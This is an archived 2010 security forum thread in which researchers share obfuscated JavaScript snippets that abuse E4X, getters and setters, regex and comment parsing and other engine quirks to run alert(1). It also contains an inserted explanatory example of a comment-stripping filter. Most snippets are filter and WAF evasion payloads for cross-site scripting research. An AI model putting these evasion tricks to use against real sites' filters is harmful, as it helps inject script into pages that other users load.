Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 
JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Posted by: Anonymous User
Date: March 23, 2010 12:54PM

G'day all

Since there hasn't been too much activity on this board as well as on the whole forum recently - besides on SEO, SQL (<- Suuperboring! Reiners - really!!1 :P j/k) and the news section I thought why not create a new weird JS thread.

This thread's major topic - JavaScript from beyond - script that gets executed but definitely shouldn't for more or less obvious reasons.

So - here's a start - inspired by thornmaker on Twitter:

({0:#0=alert/#0#/#0#(0)}) //FF2+ - 3.7+



Edited 2 time(s). Last edit at 03/29/2010 08:27AM by .mario.

Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Posted by: Gareth Heyes
Date: March 23, 2010 02:43PM

<{_=alert,'x'}></x>.*.who.knows.why.*.I.dunno(_(1))

<{_=alert,'x'}></x>.*.who.knows.why.*.I.dunno(_(1)).@yeah.*.it.can.keep.going

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 03/23/2010 02:51PM by Gareth Heyes.

Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Posted by: Reiners
Date: March 23, 2010 02:59PM

snitch :>

Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Posted by: Gareth Heyes
Date: March 24, 2010 06:11AM

/[/gi;alert(2)+[1,2,3]//alert(1)

Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Posted by: Anonymous User
Date: March 24, 2010 08:45AM

@Gareth Awesome ones! The E4X one is amazing!

This one has super powers *g*:

/.// /*////.// /./*//.//alert(1)//.//*

Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Posted by: Gareth Heyes
Date: March 24, 2010 10:27AM

Nice, I can see a few JSReg bugs coming haha two already fail the comment stripping

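The comment-stripping failure mentioned in the post above, as an added example that is not part of the original thread and is not JSReg's code: a regex-based comment stripper compared with a minimal scanner that tracks whether `/` can start a regex literal, run over two snippets quoted earlier in the thread. The function names are hypothetical, and the scanner deliberately ignores string and template literals.

```javascript
// Added example: comment stripping with and without token context.
// Inputs are two snippets quoted from the thread, used here as test data only.
const SAMPLES = [
  '/.// /*////.// /./*//.//alert(1)//.//*',
  '/[/gi;alert(2)+[1,2,3]//alert(1)',
];

// Naive filter: regex-delete block and line comments with no lexer state.
function naiveStrip(src) {
  return src.replace(/\/\*[\s\S]*?\*\//g, '').replace(/\/\/.*$/gm, '');
}

// Context-tracking scanner. A "/" starts a regex literal only where an
// operand is expected; after an operand it is division. Simplification
// (assumption of this example): strings and template literals are not handled.
function contextStrip(src) {
  let out = '', i = 0, afterOperand = false;
  while (i < src.length) {
    const c = src[i], two = src.slice(i, i + 2);
    if (two === '//') {                         // line comment: skip to EOL
      while (i < src.length && src[i] !== '\n') i++;
    } else if (two === '/*') {                  // block comment: skip past "*/"
      const end = src.indexOf('*/', i + 2);
      i = end < 0 ? src.length : end + 2;
    } else if (c === '/' && !afterOperand) {    // regex literal
      let j = i + 1, inClass = false;
      for (; j < src.length; j++) {
        if (src[j] === '\\') j++;               // skip the escaped character
        else if (src[j] === '[') inClass = true;
        else if (src[j] === ']') inClass = false;
        else if (src[j] === '/' && !inClass) break; // "/" in a class is literal
      }
      j++;
      while (/[a-z]/i.test(src[j] || '')) j++;  // regex flags
      out += src.slice(i, j);
      i = j;
      afterOperand = true;
    } else {
      out += c;
      i++;
      if (!/\s/.test(c)) afterOperand = /[\w$)\]}]/.test(c);
    }
  }
  return out;
}

for (const s of SAMPLES) {
  console.log(JSON.stringify({ naive: naiveStrip(s), context: contextStrip(s) }));
}
```

On the first sample the naive filter returns `/.` and never sees the call, while the scanner keeps `alert(1)` as live code. A filter that has to make security decisions should rely on a full parser rather than this heuristic.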
Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Posted by: Anonymous User
Date: March 24, 2010 12:57PM

Thaaat.. should not work:

ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x

Or should it? :P

Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Date: March 24, 2010 01:44PM

Here are others on the same theme:

SyntaxError.prototype.__defineGetter__('name', function() { alert(1) })
eval('====');

or

TypeError.prototype.__defineGetter__('name', function() { alert(1) })
length()

or

window.__defineSetter__('length',function(){alert(1)})
[].pop.call()

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Posted by: Gareth Heyes
Date: March 24, 2010 02:42PM

Object.prototype.__noSuchMethod__=Function;
01.&#8578;('alert("SLACKERS NEEDS UTF-8")')()

Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Posted by: Anonymous User
Date: March 24, 2010 06:43PM

<script>
openDatabase(0,'1.'+0,0,0).transaction(function($){$.executeSql('\S\e\L\x65\103T~1`alert(1)`/**',/./,function(_,$){for(_ in $.rows.item(0))eval(_)})})
</script>

Chrome 4 & 5 - so says future man

Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Date: March 25, 2010 08:57AM

Forget about it..

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)



Edited 1 time(s). Last edit at 03/25/2010 09:01AM by Jonas Magazinius.

Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Posted by: Gareth Heyes
Date: March 25, 2010 09:00AM

@Jonas

That is swwwwwwwwwwweeet haha expect this to be abused in the near future :)

Hmmmmmmmmmm doesn't work for me after trying




Edited 1 time(s). Last edit at 03/25/2010 09:03AM by Gareth Heyes.

Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Date: March 25, 2010 09:10AM

_=/./,_['*']=alert,_.*.call(null,1)



''.__proto__.__proto__['*']=function(x){alert(x)},[].*(1)

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)



Edited 1 time(s). Last edit at 03/25/2010 09:27AM by Jonas Magazinius.

Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Date: March 25, 2010 09:12AM

@Gareth - I was fooled by one of the nice SyntaxError.name tricks before. As soon as I refreshed the page it stopped working. Now it works though.

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)



Edited 1 time(s). Last edit at 03/25/2010 09:15AM by Jonas Magazinius.

Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Date: March 25, 2010 12:58PM

Finally got it to run properly:

<{XML.prototype.function::['*']=function(){alert(1)},'x'}/>.*.function::*()

OR

<{XML.prototype.function::['*']=function(){alert(1)},'x'}/>.*['*']()

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Posted by: Anonymous User
Date: March 25, 2010 05:53PM

Nice ones! More "joy of E4X"

<?_ @{}?>|<_{<?_?>}></_{alert(1)}>

Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Posted by: Gareth Heyes
Date: March 26, 2010 03:52AM

mmmmmmmmmmmmmmmmm e4x ogogooghghhghiohgh



Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Posted by: Gareth Heyes
Date: March 29, 2010 04:25AM

.00000.*(<_{alert(1)}/>.*.*.*.*).*.*.*.*

Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Posted by: satyr
Date: March 29, 2010 07:57AM

[{get:{set set set(set)set(set)}.set}]=[{get get get(get)alert}]

Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Posted by: Gareth Heyes
Date: March 29, 2010 08:51AM

@satyr

Hahaha that's insane

Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Posted by: Anonymous User
Date: March 29, 2010 11:25AM

@satyr Nice indeed - you can even combine set and setter :D

({set/**/$($){_/**/setter=$,_=1}}).$=alert

Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Posted by: Gareth Heyes
Date: April 08, 2010 08:30AM

([º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ><µ>{(![]+[])[+!![]+!![]+[]]
}</µ><µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ><µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ></ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).@À.º.Æ.Å.Ç

Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Date: April 10, 2010 08:17AM

Might have gone a little bit crazy with this one, but here goes.

<_ _={-~(_=([º]=[[]['sort']['call']()[(9*1e5*9+579600+28*30-1)[toString.name](2*3*5)]]))}>º(_)</_>.(_[+[]][atob('Y29uc3RydWN0b3I=')]('_',*)(@*)).*

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Posted by: Anonymous User
Date: April 18, 2010 10:58AM

0?<script>Worker("#").onmessage=function(_)eval(_.data)</script>:postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))

FF only (has to be saved in a HTML page to work) - E4X + Worker + expression closure + data URI + base64 + self inclusion :)



Edited 1 time(s). Last edit at 04/18/2010 11:30AM by .mario.

Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Posted by: Anonymous User
Date: April 20, 2010 05:38PM

(String.__defineGetter__('va\lue'+[<{_=eval('(function(\_\){\x61lert\u00281)})'),'__'}>Of</{'__'}>], _)+'').constructor



Edited 1 time(s). Last edit at 04/20/2010 05:39PM by .mario.

Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Posted by: Anonymous User
Date: June 04, 2010 08:04AM

Not much going on in here - so I give u this :)

a=a setter=alert

Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Date: June 06, 2010 02:46PM

@mario - This one is just wonderful! How did you come up with it?

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Posted by: Anonymous User
Date: June 06, 2010 03:27PM

@Jonas accidentally as usual ;)

Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Date: June 06, 2010 08:51PM

I agree with mario, it's been way too quiet here lately.


for(var _=alert in {get __iterator__()_(_)});


for(var _=alert in {get __iterator__()function($)({get next()function()_($)})});


Object.prototype.__defineSetter__('source',function(_)this(_));throw alert

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Re: JavaScript that should not run - but does for reasons only Brendan Eich knows - if at all...
Posted by: Gareth Heyes
Date: June 07, 2010 05:55AM

You think posting some crazy cool js is going to tempt people to post more???

window.function=function function(){return function function(){return function function(){}}()}()

It worked! :)

Yosuke Hasegawa followed up with:
window=(function with(){return function while(){return function return(){alert(1)}}()}())();
